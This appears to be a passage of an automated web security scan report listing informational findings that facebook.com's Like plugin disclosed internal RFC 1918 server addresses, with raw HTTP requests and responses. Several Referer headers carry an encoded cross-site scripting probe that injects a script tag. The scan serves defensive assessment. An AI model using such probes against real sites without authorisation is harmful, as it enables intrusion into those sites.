User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.21.64
X-Cnection: close
Date: Sat, 17 Sep 2011 16:51:42 GMT
Content-Length: 11972

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
22.66. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/back-to-black-fall-footwear-we-love/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.25.48
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:56 GMT
Content-Length: 23480

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.67. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-life/2011/dear-freshman-love-the-undecided-major/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.31.35
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:55 GMT
Content-Length: 23482

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.68. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/back-to-black-fall-footwear-we-love/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.39.40
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:40 GMT
Content-Length: 23481

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.69. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Flocal.com&send=false&layout=button_count&width=150&show_faces=true&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.124.67
X-Cnection: close
Date: Sat, 17 Sep 2011 16:28:29 GMT
Content-Length: 23394

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.70. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.19.112
X-Cnection: close
Date: Sat, 17 Sep 2011 16:43:08 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.71. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2dde7e9a%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Fmusic%2F2011%2F09%2Funofficial-video-for-jay-z-and-kanyes-ns-in-paris-is-mesmerizing%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.70.106
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:23 GMT
Content-Length: 26092

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.72. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/fashion-tips/2011/intern-files-advice-at-alexander-wang-unexpected-rewards-at-miyake-and-opening-ceremony/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.34.32
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:38 GMT
Content-Length: 23549

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.73. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe8d5a2c%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Fwebculture%2F2011%2F09%2Fwild-card-kitten-mittens-green-man-milk-steak-and-fck-yeah-tumblrs-an-interview-with-charlie-day%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.100.131
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:22 GMT
Content-Length: 26103

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.74. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.localedge.com&layout=button_count&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.localedge.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.214.49
X-Cnection: close
Date: Sat, 17 Sep 2011 16:26:32 GMT
Content-Length: 23331

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.75. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-health-beauty/2011/fall-2011-makeup-round-up/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.29.43
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:56 GMT
Content-Length: 23478

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.76. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.9.47
X-Cnection: close
Date: Sat, 17 Sep 2011 16:29:55 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.77. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/have-a-very-mod-tastic-fall/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.187.36
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:56 GMT
Content-Length: 23472

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.78. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/fashion-tips/2011/intern-files-advice-at-alexander-wang-unexpected-rewards-at-miyake-and-opening-ceremony/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.40.62
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:54 GMT
Content-Length: 23548

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.79. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/get-the-look-long-live-rock-n-roll/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.126.69
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:01 GMT
Content-Length: 23341

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.80. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10625ac4c%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Fwebculture%2F2011%2F09%2Famericas-wingnut-fatties-vent-anger-on-facebook-over-olive-garden-red-lobster-86ing-french-fries%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.92.107
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:23 GMT
Content-Length: 26101

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.81. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Flocal.com&send=false&layout=button_count&width=150&show_faces=true&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.59
X-Cnection: close
Date: Sat, 17 Sep 2011 16:55:22 GMT
Content-Length: 23393

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.82. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdcb9937%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Fmusic%2F2011%2F09%2Fa-free-version-of-the-great-mog-on-demand-music-service-is-now-live%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
